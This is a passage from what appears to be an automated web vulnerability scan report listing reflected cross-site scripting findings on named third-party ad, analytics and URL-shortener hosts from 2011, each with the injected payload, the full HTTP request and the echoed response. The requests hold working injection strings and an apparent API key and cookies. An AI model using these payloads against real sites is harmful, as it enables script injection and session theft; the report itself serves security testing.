The value of the wcguid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7d48"style%3d"x%3aexpression(alert(1))"2ce761eaace was submitted in the wcguid parameter. This input was echoed as e7d48"style="x:expression(alert(1))"2ce761eaace in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Widgets/EmailSignup.aspx?wcguid=29DFC999-F0F3-482A-9516-C8414B36C6ADe7d48"style%3d"x%3aexpression(alert(1))"2ce761eaace&height=100&width=275 HTTP/1.1
Host: affiliates.eblastengine.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Sep 2011 01:03:41 GMT
Last-Modified: Sun, 04 Sep 2011 01:02:41 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sun, 04 Sep 2011 01:02:41 GMT
Content-Length: 6922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Email S
...[SNIP]...
<input type="hidden" name="hdnWCGUID" id="hdnWCGUID" value="29DFC999-F0F3-482A-9516-C8414B36C6ADe7d48"style="x:expression(alert(1))"2ce761eaace" />
...[SNIP]...

5.7. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [width parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://affiliates.eblastengine.com
Path:	/Widgets/EmailSignup.aspx

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be580"style%3d"x%3aexpression(alert(1))"d63f3064f0 was submitted in the width parameter. This input was echoed as be580"style="x:expression(alert(1))"d63f3064f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Widgets/EmailSignup.aspx?wcguid=29DFC999-F0F3-482A-9516-C8414B36C6AD&height=100&width=275be580"style%3d"x%3aexpression(alert(1))"d63f3064f0 HTTP/1.1
Host: affiliates.eblastengine.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Sep 2011 01:04:11 GMT
Last-Modified: Sun, 04 Sep 2011 01:03:11 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sun, 04 Sep 2011 01:03:10 GMT
Content-Length: 6967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Email S
...[SNIP]...
<table id="tblWidget" cellpadding="0" cellspacing="0" border="0" style="width:275be580"style="x:expression(alert(1))"d63f3064f0px;height:100px;">
...[SNIP]...

5.8. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13966-88303-3335-5

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16e33'-alert(1)-'29065005ae7 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/13966-88303-3335-5?mpt=111967816e33'-alert(1)-'29065005ae7&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 545
Date: Sun, 04 Sep 2011 00:45:45 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;articleID=USTRE78222D20110903;~aopt=6/1/ff/1;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88303-3335-5?mpt=111967816e33'-alert(1)-'29065005ae7">
...[SNIP]...

5.9. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13966-88303-3335-5

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed8b5'%3balert(1)//13bb1e92c92 was submitted in the mpvc parameter. This input was echoed as ed8b5';alert(1)//13bb1e92c92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/13966-88303-3335-5?mpt=1119678&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3fed8b5'%3balert(1)//13bb1e92c92 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 545
Date: Sun, 04 Sep 2011 00:45:47 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;articleID=USTRE78222D20110903;~aopt=6/1/ff/1;~sscs=?ed8b5';alert(1)//13bb1e92c92http://altfarm.mediaplex.com/ad/ck/13966-88303-3335-5?mpt=1119678">
...[SNIP]...

5.10. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13966-88303-3335-5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b9f9'%3balert(1)//ba9ef290c77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b9f9';alert(1)//ba9ef290c77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/13966-88303-3335-5?mpt=1119678&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f&2b9f9'%3balert(1)//ba9ef290c77=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 548
Date: Sun, 04 Sep 2011 00:45:49 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;articleID=USTRE78222D20110903;~aopt=6/1/ff/1;~sscs=?&2b9f9';alert(1)//ba9ef290c77=1http://altfarm.mediaplex.com/ad/ck/13966-88303-3335-5?mpt=1119678">
...[SNIP]...

5.11. http://api.bit.ly/shorten [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bit.ly
Path:	/shorten

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cc1c2<script>alert(1)</script>74bf979fd was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shorten?version=2.0.1&apiKey=R_25a57bc9fea6eef6bcb03928dd05d28d&login=reutersdotcom&callback=processBitlyURLcc1c2<script>alert(1)</script>74bf979fd&longUrl=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&refreshUrlTimestamp=1315097050303 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:46:12 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 356
Etag: "573ac502eb2353400a5c161b299b6031bb670f92"

processBitlyURLcc1c2<script>alert(1)</script>74bf979fd({"errorCode": 0, "errorMessage": "", "results": {"http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903": {"userHash": "rsX0BA", "shortKeywordUrl": "", "hash": "pwdflq",
...[SNIP]...

5.12. http://api.bit.ly/shorten [longUrl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bit.ly
Path:	/shorten

Issue detail

The value of the longUrl request parameter is copied into the HTML document as plain text between tags. The payload 7e94d<script>alert(1)</script>9e18e1118a5 was submitted in the longUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shorten?version=2.0.1&apiKey=R_25a57bc9fea6eef6bcb03928dd05d28d&login=reutersdotcom&callback=processBitlyURL&longUrl=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D201109037e94d<script>alert(1)</script>9e18e1118a5&refreshUrlTimestamp=1315097050303 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:46:14 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 358
Etag: "2f364296de6d49e458eff08a4defecc36df64774"

processBitlyURL({"errorCode": 0, "errorMessage": "", "results": {"http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D201109037e94d<script>alert(1)</script>9e18e1118a5": {"userHash": "qLujX3", "shortKeywordUrl": "", "hash": "parItt", "shortCNAMEUrl": "http://reut.rs/qLujX3", "shortUrl": "http://reut.rs/qLujX3"}}, "statusCode": "OK"})

5.13. http://api.bizographics.com/v1/profile.redirect [api_key parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 9c917<script>alert(1)</script>7981b6f966 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a59c917<script>alert(1)</script>7981b6f966&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315096942310726%26sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=Pp1FHRK43Zz2RAI0uRfisMtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KdOKh03Kvii5Taj5XcunNcMDa7Re6IGD4lKWNB0md3rj0Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfsp04qHTcqipLlNqPldy6c1wwH4DELwm2ipwNsNipLFWKZvgDTbwiiAhQOisLcafhbACBAJnPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9sU8nhAxdAK9Qieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:57:41 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b42da86024eb8489645733b320;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 91
Connection: keep-alive

Unknown API key: (798c7ba2e6b04aec86d660f36f6341a59c917<script>alert(1)</script>7981b6f966)

5.14. http://api.bizographics.com/v1/profile.redirect [callback_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 2c114<script>alert(1)</script>431ab9e4b41 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=2c114<script>alert(1)</script>431ab9e4b41 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=Pp1FHRK43Zz2RAI0uRfisMtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KdOKh03Kvii5Taj5XcunNcMDa7Re6IGD4lKWNB0md3rj0Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfsp04qHTcqipLlNqPldy6c1wwH4DELwm2ipwNsNipLFWKZvgDTbwiiAhQOisLcafhbACBAJnPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9sU8nhAxdAK9Qieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:57:58 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b42da86024eb8489645733b320;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: 2c114<script>alert(1)</script>431ab9e4b41

5.15. http://api.echoenabled.com/v1/search [q parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://api.echoenabled.com
Path:	/v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 632bc<a>7925c1cf403 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/search?callback=jQuery16108104765831958503_1315096982333&q=itemsPerPage%3A5+sortOrder%3AreverseChronological+-state%3AModeratorDeleted+-state%3ASystemFlagged+-state%3AModeratorFlagged+-provider%3AContextVoice+-source%3Areuters.com+-source%3Ablogs.reuters.com++childrenof%3Ahttp%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903+632bc<a>7925c1cf403&appkey=prod.reuters.com&_=1315097065797 HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Sun, 04 Sep 2011 00:50:24 GMT
Content-Length: 161
Content-Type: application/x-javascript; charset="utf-8"

jQuery16108104765831958503_1315096982333({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"632bc<a>7925c1cf403\" at 299" });

5.16. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 7d745<script>alert(1)</script>52a1d786209 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=87d745<script>alert(1)</script>52a1d786209&c2=2113&c3=13&c4=13473&c5=45394&c6=&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:17 GMT
Date: Sun, 04 Sep 2011 00:45:17 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"87d745<script>alert(1)</script>52a1d786209", c2:"2113", c3:"13", c4:"13473", c5:"45394", c6:"", c10:"239096", c15:"", c16:"", r:""});

5.17. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload ab874<script>alert(1)</script>87274f504e7 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=13473&c5=45394&c6=&c10=239096ab874<script>alert(1)</script>87274f504e7&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:18 GMT
Date: Sun, 04 Sep 2011 00:45:18 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394", c6:"", c10:"239096ab874<script>alert(1)</script>87274f504e7", c15:"", c16:"", r:""});

5.18. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 9dc8e<script>alert(1)</script>368b40879a7 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=13473&c5=45394&c6=&c10=239096&c15=9dc8e<script>alert(1)</script>368b40879a7 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:18 GMT
Date: Sun, 04 Sep 2011 00:45:18 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394", c6:"", c10:"239096", c15:"9dc8e<script>alert(1)</script>368b40879a7", c16:"", r:""});

5.19. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload b1b71<script>alert(1)</script>27ada6e0b14 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113b1b71<script>alert(1)</script>27ada6e0b14&c3=13&c4=13473&c5=45394&c6=&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
